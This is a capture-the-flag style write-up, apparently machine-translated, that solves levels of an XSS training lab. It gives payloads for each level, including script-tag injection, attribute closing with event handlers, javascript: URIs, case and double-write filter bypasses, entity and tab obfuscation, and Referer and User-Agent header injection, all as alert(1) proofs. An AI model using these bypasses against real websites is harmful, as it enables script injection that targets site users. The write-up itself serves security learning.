XSS learning XSS lab problem solution

Catalog

 XSS type ​

level 1 No filtering

level 2 input closed

level 3 Single quote closure + Add event

level 4 Double quotes closed + Add event

level 5 JavaScript Fake protocol

level 6 Case around

level 7 Double writing bypasses

level 8 Code bypass

level 9 code + Detect keywords

level 10 Hidden information

 level 11 Referer

level 12 User-agent

level 13 cookie

level 16 Space entity escape

 XSS type

level 1 No filtering

There is no protection , direct url Pass on xss

 name=<script>alert(1)</script>

level 2 input closed

  There is one input label , Try to use "> Closed label

( In the web source code , The data we input , It's in the form value Within the properties , So you need to close first input label , Then inject code , Closed label )

"><script>alert(1)</script>

level 3 Single quote closure + Add event

The test found that angle brackets were converted into character entities , And this question is closed with single quotation marks  

You can't script Code , Change direction , Use the events in the form to call alert(), Close the single quotation marks before and after

' onclick='alert(1) 

level 4 Double quotes closed + Add event

After trial , View source code , It was found that it was filtered <>, It's also " closed

Bypass similar to the above question

test" onclick="alert(1) 

level 5 JavaScript Fake protocol

This level will ri Convert to r_i, So consider bypassing the mechanism

And found that on It's also filtered , And all event attributes have on Of , Therefore, events cannot be used here

Construct a Payload Close close the original label , Recreate a a label

a Introduce a script Hyperlink to call popup

"><a href="javascript:alert(1)">link</a>

level 6 Case around

After trying, I still filtered the keywords

Try the fifth level "><a href="javascript:alert(1)">link</a>

  This level does not filter case , Capitalize HREF Yes. ,

All labels can be used , Just change to capital , Or mix case

"><a HREF="javascript:alert(1)">link</a>
"><SCRIPT>alert(1)</SCRIPT>

level 7 Double writing bypasses

Test it

The direct filter is empty , So consider double writing keywords

"><scscriptript>alert(1)</scscriptript>

level 8 Code bypass

Filtered keywords , Here's the question a link , So we operate here

script The converted character entity is &#x73;&#x63;&#x72;&#x69;&#x70;&#x74;

structure payload

javascript:alert(1)

We have another way to use this level tab Key to bypass  , use tab Separate script

javasc	ript:alert(1)

level 9 code + Detect keywords

Use the eighth pass , Echo this

 payload It's going to be followed by http://

javasc	ript:alert(1)//http://
javascript:alert(1)//http://

level 10 Hidden information

  There is no input point in the interface ,input It's hidden

 F12 Delete hidden, Because angle brackets are filtered , So use events  ,

"type="text" onclick="alert(1)

It's fine too url Just fill in

/level10.php?t_sort="onclick=alert(1) type=text"

 level 11 Referer

see wp I don't quite understand , That is to say, grab a bag , modify referer

  After catching the packet, add referer Head can realize input Inject

Then you can modify referer Come on xss attack

referer: "type="text" onclick="alert(1)

  Then put the bag

level 12 User-agent

Here is another question ua, That is to say User-agent, 

We continue to judge that User-agent for xss, Grab the bag , Such is the case

Directly in UA Just add it later

  Put the bag through

level 13 cookie

Here again cookie, Try the old method , There is something wrong with the document here, but it doesn't come out

, see wp The same idea as the previous two questions

level 16 Space entity escape

It's filtered out script And spaces and put / replaced  ; But no filtering <> So we construct statements ：

Construction statement ：

<img
src=”111”
onerror=alert(1)
>

have access to %0a Line break , That is to say

<img%0asrc="111"%0aonerror=alert(1)%0a>